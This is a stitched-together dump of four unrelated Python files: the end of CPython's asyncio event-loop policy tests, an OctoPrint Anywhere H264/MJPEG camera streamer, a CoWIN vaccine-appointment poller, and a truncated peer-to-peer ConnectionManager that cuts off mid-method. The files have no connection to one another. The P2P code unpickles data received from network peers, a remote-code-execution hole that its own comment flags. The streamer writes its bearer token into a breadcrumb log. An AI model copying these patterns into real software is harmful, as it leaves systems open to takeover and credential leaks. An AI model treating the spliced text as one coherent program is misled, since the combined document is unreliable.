                    await factory()

        loop = asyncio.new_event_loop()
        loop.run_until_complete(inner())
        loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(TypeError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
TypeError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
    """Runs get_event_loop()/get_running_loop() tests against a chosen
    implementation (pure Python or C; see the subclasses below).

    setUp() swaps the subclass-provided implementations into both the
    ``events`` module and the top-level ``asyncio`` namespace; tearDown()
    restores the originals, so the patching never leaks between tests.
    """

    # Filled in by concrete subclasses with the implementation under test.
    _get_running_loop_impl = None
    _set_running_loop_impl = None
    get_running_loop_impl = None
    get_event_loop_impl = None

    def setUp(self):
        # Save the currently installed implementations for tearDown().
        self._get_running_loop_saved = events._get_running_loop
        self._set_running_loop_saved = events._set_running_loop
        self.get_running_loop_saved = events.get_running_loop
        self.get_event_loop_saved = events.get_event_loop

        # Install the implementation under test in the events module...
        events._get_running_loop = type(self)._get_running_loop_impl
        events._set_running_loop = type(self)._set_running_loop_impl
        events.get_running_loop = type(self).get_running_loop_impl
        events.get_event_loop = type(self).get_event_loop_impl

        # ...and in the re-exported asyncio namespace.
        asyncio._get_running_loop = type(self)._get_running_loop_impl
        asyncio._set_running_loop = type(self)._set_running_loop_impl
        asyncio.get_running_loop = type(self).get_running_loop_impl
        asyncio.get_event_loop = type(self).get_event_loop_impl

        super().setUp()

        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(self.loop)
        if sys.platform != 'win32':
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

    def tearDown(self):
        try:
            if sys.platform != 'win32':
                asyncio.set_child_watcher(None)

            super().tearDown()
        finally:
            # Always restore the saved implementations, even if the
            # test body or super().tearDown() failed.
            self.loop.close()
            asyncio.set_event_loop(None)

            events._get_running_loop = self._get_running_loop_saved
            events._set_running_loop = self._set_running_loop_saved
            events.get_running_loop = self.get_running_loop_saved
            events.get_event_loop = self.get_event_loop_saved

            asyncio._get_running_loop = self._get_running_loop_saved
            asyncio._set_running_loop = self._set_running_loop_saved
            asyncio.get_running_loop = self.get_running_loop_saved
            asyncio.get_event_loop = self.get_event_loop_saved

    if sys.platform != 'win32':

        def test_get_event_loop_new_process(self):
            # bpo-32126: The multiprocessing module used by
            # ProcessPoolExecutor is not functional when the
            # multiprocessing.synchronize module cannot be imported.
            support.skip_if_broken_multiprocessing_synchronize()

            async def main():
                pool = concurrent.futures.ProcessPoolExecutor()
                result = await self.loop.run_in_executor(
                    pool, _test_get_event_loop_new_process__sub_proc)
                pool.shutdown()
                return result

            self.assertEqual(
                self.loop.run_until_complete(main()),
                'hello')

    def test_get_event_loop_returns_running_loop(self):
        """Inside a running loop get_event_loop() bypasses the policy and
        returns the running loop; outside it defers to the policy (and
        emits a DeprecationWarning)."""
        class TestError(Exception):
            pass

        class Policy(asyncio.DefaultEventLoopPolicy):
            def get_event_loop(self):
                raise TestError

        old_policy = asyncio.get_event_loop_policy()
        try:
            asyncio.set_event_loop_policy(Policy())
            loop = asyncio.new_event_loop()

            # No running loop: get_event_loop() falls through to the
            # (raising) policy and warns about the deprecated behaviour.
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaises(TestError):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

            asyncio.set_event_loop(None)
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaises(TestError):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

            with self.assertRaisesRegex(RuntimeError, 'no running'):
                asyncio.get_running_loop()

            self.assertIs(asyncio._get_running_loop(), None)

            async def func():
                # While the loop runs, all three accessors agree on it.
                self.assertIs(asyncio.get_event_loop(), loop)
                self.assertIs(asyncio.get_running_loop(), loop)
                self.assertIs(asyncio._get_running_loop(), loop)

            loop.run_until_complete(func())

            asyncio.set_event_loop(loop)
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaises(TestError):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

            asyncio.set_event_loop(None)
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaises(TestError):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

        finally:
            asyncio.set_event_loop_policy(old_policy)
            if loop is not None:
                loop.close()

        with self.assertRaisesRegex(RuntimeError, 'no running'):
            asyncio.get_running_loop()

        self.assertIs(asyncio._get_running_loop(), None)

    def test_get_event_loop_returns_running_loop2(self):
        """Same as above but with the default policy: get_event_loop()
        creates/returns the current loop (with a DeprecationWarning)."""
        old_policy = asyncio.get_event_loop_policy()
        try:
            asyncio.set_event_loop_policy(asyncio.DefaultEventLoopPolicy())
            loop = asyncio.new_event_loop()
            self.addCleanup(loop.close)

            with self.assertWarns(DeprecationWarning) as cm:
                loop2 = asyncio.get_event_loop()
            self.addCleanup(loop2.close)
            self.assertEqual(cm.warnings[0].filename, __file__)

            asyncio.set_event_loop(None)
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaisesRegex(RuntimeError, 'no current'):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

            with self.assertRaisesRegex(RuntimeError, 'no running'):
                asyncio.get_running_loop()

            self.assertIs(asyncio._get_running_loop(), None)

            async def func():
                self.assertIs(asyncio.get_event_loop(), loop)
                self.assertIs(asyncio.get_running_loop(), loop)
                self.assertIs(asyncio._get_running_loop(), loop)

            loop.run_until_complete(func())

            asyncio.set_event_loop(loop)
            with self.assertWarns(DeprecationWarning) as cm:
                self.assertIs(asyncio.get_event_loop(), loop)
            self.assertEqual(cm.warnings[0].filename, __file__)

            asyncio.set_event_loop(None)
            with self.assertWarns(DeprecationWarning) as cm:
                with self.assertRaisesRegex(RuntimeError, 'no current'):
                    asyncio.get_event_loop()
            self.assertEqual(cm.warnings[0].filename, __file__)

        finally:
            asyncio.set_event_loop_policy(old_policy)
            if loop is not None:
                loop.close()

        with self.assertRaisesRegex(RuntimeError, 'no running'):
            asyncio.get_running_loop()

        self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
    """Run the mixin tests against the pure-Python implementations."""

    _get_running_loop_impl = events._py__get_running_loop
    _set_running_loop_impl = events._py__set_running_loop
    get_running_loop_impl = events._py_get_running_loop
    get_event_loop_impl = events._py_get_event_loop
# The C-accelerated variants are only tested when the _asyncio extension
# module is available on this build.
try:
    import _asyncio  # NoQA
except ImportError:
    pass
else:

    class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
        """Run the mixin tests against the C-accelerated implementations."""

        _get_running_loop_impl = events._c__get_running_loop
        _set_running_loop_impl = events._c__set_running_loop
        get_running_loop_impl = events._c_get_running_loop
        get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
    """Checks the Server object returned by a real create_server() call."""

    def test_get_loop(self):
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)

        protocol = MyProto(loop)
        create = loop.create_server(lambda: protocol, '0.0.0.0', 0)
        server = loop.run_until_complete(create)

        # The server reports the loop that created it.
        self.assertEqual(server.get_loop(), loop)

        server.close()
        loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
    """events.AbstractServer is an interface: its methods must raise."""

    def test_close(self):
        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            server.close()

    def test_wait_closed(self):
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)

        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            loop.run_until_complete(server.wait_closed())

    def test_get_loop(self):
        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            server.get_loop()
# Allow running this test module directly (outside the regrtest driver).
if __name__ == '__main__':
    unittest.main()
|
h264_stream.py | import io
import os
import logging
import subprocess
import time
import sarge
import sys
import flask
from collections import deque
try:
import queue
except ImportError:
import Queue as queue
from threading import Thread, RLock
import requests
import yaml
from raven import breadcrumbs
import tempfile
from .utils import pi_version
_logger = logging.getLogger('octoprint.plugins.anywhere')

# Bundled ffmpeg binary (replaced with the system ffmpeg when not on a Pi).
FFMPEG = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bin', 'ffmpeg')

# Marker file other plugins create to claim exclusive use of the pi camera.
CAM_EXCLUSIVE_USE = os.path.join(tempfile.gettempdir(), '.using_picam')

# Scratch directory for the HLS (.ts) segments ffmpeg produces.
TS_TEMP_DIR = os.path.join(tempfile.gettempdir(), 'octoprintanywhere-ts')
# makedirs(exist_ok=True) avoids the check-then-create race of the previous
# os.path.exists() + os.mkdir() pair when two processes start at once.
os.makedirs(TS_TEMP_DIR, exist_ok=True)
class WebcamServer:
    """Serves the pi camera over HTTP on :8080, mimicking mjpeg-streamer's
    ``?action=snapshot`` / ``?action=stream`` interface."""

    def __init__(self, camera):
        self.camera = camera
        # maxsize=1: the producer blocks until a consumer takes the frame,
        # which naturally throttles capture to the consumers' pace.
        self.img_q = queue.Queue(maxsize=1)
        self.last_capture = 0  # wall-clock time of the most recent frame
        self._mutex = RLock()

    def capture_forever(self):
        """Continuously capture JPEG frames into img_q (thread target)."""
        bio = io.BytesIO()
        for _ in self.camera.capture_continuous(bio, format='jpeg', use_video_port=True):
            bio.seek(0)
            chunk = bio.read()
            bio.seek(0)
            bio.truncate()

            with self._mutex:
                # (the previous dead local tracking the prior timestamp
                # was removed; nothing read it)
                self.last_capture = time.time()

            self.img_q.put(chunk)

    def mjpeg_generator(self, boundary):
        """Yield multipart/x-mixed-replace MJPEG parts until the client
        disconnects (GeneratorExit)."""
        try:
            hdr = '--%s\r\nContent-Type: image/jpeg\r\n' % boundary
            prefix = ''
            while True:
                chunk = self.img_q.get()
                msg = prefix + hdr + 'Content-Length: {}\r\n\r\n'.format(len(chunk))
                yield msg.encode('iso-8859-1') + chunk
                prefix = '\r\n'
                time.sleep(0.15)  # slow down mjpeg streaming so that it won't use too much cpu or bandwidth
        except GeneratorExit:
            print('closed')

    def get_snapshot(self):
        """Return one *fresh* JPEG frame as a flask response."""
        possible_stale_pics = 3
        while True:
            chunk = self.img_q.get()
            with self._mutex:
                gap = time.time() - self.last_capture
            if gap < 0.1:
                # Get a few pics to make sure we are not returning a stale
                # pic, which will throw off Octolapse
                possible_stale_pics -= 1
                if possible_stale_pics <= 0:
                    break
        return flask.send_file(io.BytesIO(chunk), mimetype='image/jpeg')

    def get_mjpeg(self):
        """Return the endless MJPEG stream as a flask response."""
        boundary = 'herebedragons'
        return flask.Response(
            flask.stream_with_context(self.mjpeg_generator(boundary)),
            mimetype='multipart/x-mixed-replace;boundary=%s' % boundary)

    def run_forever(self):
        """Run the blocking flask app (thread target)."""
        webcam_server_app = flask.Flask('webcam_server')

        @webcam_server_app.route('/')
        def webcam():
            action = flask.request.args['action']
            if action == 'snapshot':
                return self.get_snapshot()
            else:
                return self.get_mjpeg()

        webcam_server_app.run(host='0.0.0.0', port=8080, threaded=True)

    def start(self):
        """Start the HTTP server and the capture loop as daemon threads."""
        cam_server_thread = Thread(target=self.run_forever)
        cam_server_thread.daemon = True
        cam_server_thread.start()

        capture_thread = Thread(target=self.capture_forever)
        capture_thread.daemon = True
        capture_thread.start()
class H264Streamer:
    """Captures H264 from the pi camera, muxes it into HLS segments with
    ffmpeg and uploads each finished .ts segment to the streaming server."""

    def __init__(self, stream_host, token, sentryClient):
        self.m3u8_q = deque([], 24)
        self.stream_host = stream_host
        self.token = token
        self.sentryClient = sentryClient

    def __init_camera__(self, plugin, dev_settings):
        """Configure the pi camera (or a stub when not on a Pi).

        Returns True on success, False when the camera could not be
        initialized (mjpeg-streamer is restarted as a fallback).
        """

        def resolution_tuple(dev_settings):
            res_map = {
                "low": (320, 240),
                "medium": (640, 480),
                "high": (1296, 972),
                "high_16_9": (1280, 720),
                "ultrahigh_16_9": (1920, 1080),
            }
            resolution = res_map[dev_settings.get('camResolution', 'medium')]
            # need to swap width and height if rotated
            return reversed(resolution) if dev_settings.get('rotate90', False) ^ dev_settings.get('rotate90N', False) else resolution

        if not pi_version():
            # Development machine: use canned h264 clips and the system ffmpeg.
            self.camera = StubCamera()
            global FFMPEG
            FFMPEG = 'ffmpeg'
        else:
            sarge.run('sudo service webcamd stop')
            try:
                import picamera
                self.camera = picamera.PiCamera()
                self.camera.framerate = 25
                self.camera.resolution = resolution_tuple(dev_settings)
                self.camera.hflip = dev_settings.get('flipH', False)
                self.camera.vflip = dev_settings.get('flipV', False)
                rotation = (90 if dev_settings.get('rotate90', False) else 0)
                rotation += (-90 if dev_settings.get('rotate90N', False) else 0)
                self.camera.rotation = rotation
            except Exception:
                # failed to start picamera. falling back to mjpeg-streamer
                # (narrowed from a bare `except:` so Ctrl-C still works)
                sarge.run('sudo service webcamd start')
                plugin.config.set_picamera_error(True)
                self.sentryClient.captureException()
                _logger.exception('Failed to initialize pi camera')
                return False

        return True

    def start_hls_pipeline(self, remote_status, plugin, dev_settings):
        """Main loop: start ffmpeg, then record from the camera whenever a
        remote viewer is watching (remote_status['watching'])."""
        breadcrumbs.record(message="Token to upload mpegts: " + self.token)

        # Wait to make sure other plugins that may use pi camera to init
        # first, then yield to them if they are already using pi camera
        time.sleep(10)
        if os.path.exists(CAM_EXCLUSIVE_USE):
            _logger.warning('Conceding pi camera exclusive use')
            return

        if not self.__init_camera__(plugin, dev_settings):
            return

        self.webcam_server = WebcamServer(self.camera)
        self.webcam_server.start()

        # Stream timestamps should be reset when ffmepg restarts
        requests.delete(self.stream_host+'/video/mpegts', headers={"Authorization": "Bearer " + self.token})

        ffmpeg_cmd = '{} -re -i pipe:0 -y -an -vcodec copy -f hls -hls_time 2 -hls_list_size 10 -hls_delete_threshold 10 -hls_flags split_by_time+delete_segments+second_level_segment_index -strftime 1 -hls_segment_filename {}/%s-%%d.ts -hls_segment_type mpegts -'.format(FFMPEG, TS_TEMP_DIR)
        _logger.warning('Launching: ' + ffmpeg_cmd)
        # subprocess.DEVNULL instead of an open(os.devnull) handle that the
        # previous version never closed.
        sub_proc = subprocess.Popen(ffmpeg_cmd.split(' '), stdin=subprocess.PIPE,
                                    stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)

        m3u8_thread = Thread(target=self.poll_m3u8, args=(sub_proc,))
        m3u8_thread.daemon = True  # Thread.setDaemon() is deprecated
        m3u8_thread.start()

        while True:
            if remote_status['watching']:
                self.camera.start_recording(
                    sub_proc.stdin, format='h264',
                    quality=(30 if 'high' in dev_settings.get('camResolution', 'medium') else 23))
                while remote_status['watching']:
                    self.camera.wait_recording(2)
                # record 4 more seconds to minimize the pause when the user
                # views the stream again
                self.camera.wait_recording(4)
                self.camera.stop_recording()
            else:
                time.sleep(0.05)

    def poll_m3u8(self, sub_proc):
        """Read ffmpeg stdout and upload every newly finished .ts segment."""
        last_10 = deque([], 10)
        while True:
            line = sub_proc.stdout.readline().decode('iso-8859-1').strip()
            # dedupe against the last few names in case ffmpeg repeats one
            if line.endswith('.ts') and line not in last_10:
                last_10.append(line)
                self.upload_mpegts_to_server(os.path.join(TS_TEMP_DIR, line))

    def upload_mpegts_to_server(self, mpegts):
        """POST one .ts segment to the streaming server (best effort)."""
        try:
            # `with` closes the segment file even when the POST fails; the
            # previous version leaked one file handle per segment.
            with open(mpegts, 'rb') as seg:
                r = requests.post(self.stream_host+'/video/mpegts',
                                  data={'filename': mpegts},
                                  files={'file': ('ts', seg)},
                                  headers={"Authorization": "Bearer " + self.token})
            r.raise_for_status()
        except Exception:
            # Best effort: report the failure but keep streaming.
            self.sentryClient.captureException()
            _logger.exception('Failed to upload %s', mpegts)
class StubCamera:
    """Fake picamera.PiCamera replacement for development off the Pi.

    Endlessly cycles through pre-recorded .h264 clips instead of producing
    live camera output.
    """

    def __init__(self, h264s_path='/mjpg-streamer/h264s'):
        # h264s_path is now a parameter (defaulting to the old hard-coded
        # location) so the stub can be pointed at any clip directory.
        from itertools import cycle
        h264s = [os.path.join(h264s_path, name)
                 for name in sorted(os.listdir(h264s_path))]
        self.h264_files = cycle(h264s)
        self.running = False
        self.last_frame = 0

    def capture_continuous(self, bio, format='jpeg', use_video_port=True):
        # Stub: no still-image capture available.
        return []

    def start_recording(self, stream, **kargs):
        self.running = True
        thr = Thread(target=self.stream_h264_files, args=(stream,))
        thr.daemon = True  # Thread.setDaemon() is deprecated
        thr.start()

    def stop_recording(self):
        self.running = False

    def wait_recording(self, seconds):
        time.sleep(seconds)

    def stream_h264_files(self, stream):
        for fn in self.h264_files:
            if not self.running:
                return
            # pace playback at roughly one clip every 2 seconds
            time.sleep(max(2 - (time.time() - self.last_frame), 0))
            self.last_frame = time.time()
            # h264 is binary: the previous text-mode open() would raise
            # UnicodeDecodeError (or corrupt data) on Python 3.
            with open(fn, 'rb') as f:
                stream.write(f.read())
if __name__ == "__main__":
    # Manual test harness: run the HLS pipeline against the stub camera and
    # serve the generated segments on http://localhost:3333.
    from flask import Flask, request, Response, send_from_directory
    app = Flask(__name__)

    # Fixes over the previous harness: H264Streamer was constructed with no
    # arguments (its __init__ takes three), livestream_m3u8 referenced an
    # undefined global `m3u8_q` (the queue lives on the streamer instance),
    # and start_hls_pipeline was called with the wrong arity.
    streamer = H264Streamer('asdf', 'dev-token', None)

    @app.route('/<path:path>')
    def send_js(path):
        return send_from_directory(TS_TEMP_DIR, path)

    @app.route('/livestream.m3u8')
    def livestream_m3u8():
        response = '\n'.join(list(streamer.m3u8_q))
        resp = Response(response, mimetype='application/vnd.apple.mpegurl')
        resp.headers["Access-Control-Allow-Origin"] = "*"
        resp.headers["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
        resp.headers["Access-Control-Max-Age"] = "1000"
        resp.headers["Access-Control-Allow-Headers"] = "*"
        return resp

    def start_server():
        app.run(host='0.0.0.0', port=3333, threaded=False)

    t2 = Thread(target=start_server)
    t2.daemon = True
    t2.start()

    # start_hls_pipeline(remote_status, plugin, dev_settings)
    streamer.start_hls_pipeline({'watching': True}, None, {})
|
code.py | import sys
import json
import time
import requests
import threading
from .notifier import emailsend, dummySend
def User_check(user):
    """Poll the CoWIN public API every 3 seconds for open vaccination
    sessions matching *user*'s pincode and date.

    Loops until a non-empty session list is returned, then sends one
    notification and stops. Intended to run as a thread target (see
    ``subcription``).
    """
    while True:
        time.sleep(3)
        api = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode="+user.pincd+"&date="+user.date
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
        print(api)
        response = requests.get(api, headers=headers)
        # response.json() replaces the equivalent json.loads(response.text).
        op = response.json()
        # Truthiness check replaces the un-Pythonic `if op['sessions'] == []: pass / else:`.
        if op['sessions']:
            dummySend(user, op)
            # NOTE: in a worker thread sys.exit() raises SystemExit and
            # terminates only this thread, not the whole program.
            sys.exit()
def subcription(rcvr):
    """Kick off a background availability check for *rcvr*.

    (Function name kept as-is — callers depend on the existing spelling.)
    """
    worker = threading.Thread(target=User_check, args=(rcvr,))
    worker.start()
connection_manager_old.py | import socket
import threading
import pickle
import signal
import codecs
import time
import os
from concurrent.futures import ThreadPoolExecutor
from .message_manager import (
MessageManager,
MSG_ADD,
MSG_REMOVE,
MSG_CORE_LIST,
MSG_REQUEST_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
MSG_REMOVE_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# Value for testing; in production something like 30 minutes (1800s) would probably be better.
PING_INTERVAL = 10
class ConnectionManager:
    """Tracks peer Core/Edge nodes of a simple P2P network and relays
    protocol messages between them.

    State is two in-memory sets of (host, port) tuples. Liveness of the
    peers is re-checked on a repeating timer, and the refreshed Core list
    is broadcast (pickled) whenever it changes.
    """

    def __init__(self, host, my_port):
        print('Initializing ConnectionManager...')
        self.host = host
        self.port = my_port
        # (host, port) tuples; this node is always a member of its own list.
        self.core_node_set = set()
        self.edge_node_set = set()
        self.__add_peer((host, my_port))
        self.mm = MessageManager()

    # Called when starting to listen (for ServerCore).
    def start(self):
        """Spawn the accept loop and arm the periodic liveness checks."""
        t = threading.Thread(target=self.__wait_for_access)
        t.start()
        self.ping_timer_p = threading.Timer(PING_INTERVAL, self.__check_peers_connection)
        self.ping_timer_p.start()
        self.ping_timer_e = threading.Timer(PING_INTERVAL, self.__check_edges_connection)
        self.ping_timer_e.start()

    # Connect to a known Core node specified by the user (for ServerCore).
    def join_network(self, host, port):
        self.__connect_to_P2PNW(host, port)

    # Send a message to the specified node.
    def send_msg(self, peer, msg):
        """One-shot TCP send; on failure the peer is dropped from the Core list."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((peer))
            s.sendall(msg.encode('utf-8'))
            s.close()
        except OSError:
            print('Connection failed for peer : ', peer)
            self.__remove_peer(peer)

    # Broadcast the same message to every node in the Core node list.
    def send_msg_to_all_peer(self, msg):
        print('send_msg_to_all_peer was called! ')
        for peer in self.core_node_set:
            # Skip ourselves — we are always in our own core list.
            if peer != (self.host, self.port):
                print('message will be sent to ... ', peer)
                self.send_msg(peer, msg)

    # Broadcast the same message to every node in the Edge node list.
    def send_msg_to_all_edge(self, msg):
        print('send_msg_to_all_edge was called! ')
        for edge in self.edge_node_set:
            print("message will be sent to ... " ,edge)
            self.send_msg(edge, msg)

    # Close the listening socket and cancel the timers before shutdown.
    def connection_close(self):
        # NOTE(review): the throwaway connect below appears to exist only to
        # unblock the blocking accept() loop so self.socket can be closed —
        # confirm that is the intent.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.host, self.port))
        self.socket.close()
        s.close()
        self.ping_timer_p.cancel()
        self.ping_timer_e.cancel()

    def __connect_to_P2PNW(self, host, port):
        # Announce ourselves (MSG_ADD with our own listen port) to a known node.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        msg = self.mm.build(MSG_ADD, self.port)
        s.sendall(msg.encode('utf-8'))
        s.close()

    def __wait_for_access(self):
        """Accept loop: hand each incoming connection to a pool worker."""
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.bind((self.host, self.port))
        self.socket.listen(0)
        executor = ThreadPoolExecutor(max_workers=os.cpu_count())
        while True:
            print('Waiting for the connection ...')
            soc, addr = self.socket.accept()
            print('Connected by .. ', addr)
            data_sum = ''
            params = (soc, addr, data_sum)
            executor.submit(self.__handle_message, params)

    # Inspect a received message and act on its content. Internal use only.
    def __handle_message(self, params):
        soc, addr, data_sum = params
        # Drain the socket until the sender closes its end of the connection.
        while True:
            data = soc.recv(1024)
            data_sum = data_sum + data.decode('utf-8')
            if not data:
                break
        if not data_sum:
            return
        result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
        print(result, reason, cmd, peer_port, payload)
        status = (result, reason)
        if status == ('error', ERR_PROTOCOL_UNMATCH):
            print('Error: Protocol name is not matched')
            return
        elif status == ('error', ERR_VERSION_UNMATCH):
            print('Error: Protocol version is not matched')
            return
        elif status == ('ok', OK_WITHOUT_PAYLOAD):
            if cmd == MSG_ADD:
                print('ADD node request was received!!')
                self.__add_peer((addr[0], peer_port))
                if (addr[0], peer_port) == (self.host, self.port):
                    return
                else:
                    # Share the updated Core list with everyone.
                    cl = pickle.dumps(self.core_node_set, 0).decode()
                    msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
                    self.send_msg_to_all_peer(msg)
            elif cmd == MSG_REMOVE:
                self.__remove_peer((addr[0], peer_port))
                cl = pickle.dumps(self.core_node_set, 0).decode()
                msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
                self.send_msg_to_all_peer(msg)
            elif cmd == MSG_PING:
                # Nothing particular to do for a ping.
                return
            elif cmd == MSG_REQUEST_CORE_LIST:
                print('List for Core nodes was requested!!')
                cl = pickle.dumps(self.core_node_set, 0).decode()
                msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
                self.send_msg((addr[0], peer_port), msg)
            elif cmd == MSG_ADD_AS_EDGE:
                self.__add_edge_node((addr[0], peer_port, payload))
                cl = pickle.dumps(self.core_node_set, 0).decode()
                msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
                self.send_msg((addr[0], peer_port), msg)
            elif cmd == MSG_REMOVE_EDGE:
                self.__remove_edge_node((addr[0], peer_port))
            else:
                print('received unknown command', cmd)
                return
        elif status == ('ok', OK_WITH_PAYLOAD):
            if cmd == MSG_CORE_LIST:
                # TODO: blindly overwriting the list with whatever was received
                # is not ideal security-wise; keys of trusted nodes may need to
                # be pinned. (To be discussed further in chapter 6.)
                print('Refresh the core node list...')
                # SECURITY NOTE: pickle.loads on data received from the network
                # is unsafe against a malicious peer — flagged for review.
                new_core_set = pickle.loads(payload.encode('utf8'))
                print('latest core node list: ', new_core_set)
                self.core_node_set = new_core_set
            else:
                print('received unknown command', cmd)
                return
        else:
            print('Unexpected status', status)

    # Add a newly connected Core node to the list. Internal use only.
    def __add_peer(self, peer):
        print('Adding peer: ', peer)
        self.core_node_set.add((peer))
        print('Current Core set: ', self.core_node_set)

    # Add a newly connected Edge node to the list. Internal use only.
    def __add_edge_node(self, edge):
        print('Adding edge: ', edge)
        self.edge_node_set.add((edge))
        print('Current Edge set: ', self.edge_node_set)

    # Remove a departed Core node from the list. Internal use only.
    def __remove_peer(self, peer):
        if peer in self.core_node_set:
            print('Removing peer: ', peer)
            self.core_node_set.remove(peer)
            print('Current Core set: ', self.core_node_set)

    # Remove a departed Edge node from the list. Internal use only.
    def __remove_edge_node(self, edge):
        if edge in self.edge_node_set:
            print('Removing edge: ', edge)
            self.edge_node_set.remove(edge)
            print('Current Edge set: ', self.edge_node_set)

    def __check_peers_connection(self):
        """
        Check liveness of every known Core node. Internal use only.
        Runs periodically — re-arms its own timer at the end.
        """
        print('check_peers_connection was called')
        changed = False
        dead_c_node_set = list(filter(lambda p: not self.__is_alive(p), self.core_node_set))
        if dead_c_node_set:
            changed = True
            print('Removing ', dead_c_node_set)
            self.core_node_set = self.core_node_set - set(dead_c_node_set)
            print('current core node list:', self.core_node_set)
        # Broadcast only when the list actually changed.
        if changed:
            cl = pickle.dumps(self.core_node_set, 0).decode()
            msg = self.mm.build(MSG_CORE_LIST, self.port, cl)
            self.send_msg_to_all_peer(msg)
        self.ping_timer_p = threading.Timer(PING_INTERVAL, self.__check_peers_connection)
        self.ping_timer_p.start()

    def __check_edges_connection(self):
        """
        Check liveness of every known Edge node. Internal use only.
        Runs periodically — re-arms its own timer at the end.
        """
        print('check_edges_connection was called')
        dead_e_node_set = list(filter(lambda p: not self.__is_alive(p), self.edge_node_set))
        if dead_e_node_set:
            print('Removing ', dead_e_node_set)
            self.edge_node_set = self.edge_node_set - set(dead_e_node_set)
            print('current edge node list:', self.edge_node_set)
        self.ping_timer_e = threading.Timer(PING_INTERVAL, self.__check_edges_connection)
        self.ping_timer_e.start()

    def __is_alive(self, target):
        """
        Send a liveness-probe (PING) message.
        param:
            target : connection info (IP address and port) of the node to probe
        """
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((target))
            msg_type = MSG_PING
            msg = self.mm.build(msg_type)
            s.sendall(msg.encode('utf-8'))
            s.close()
            return True
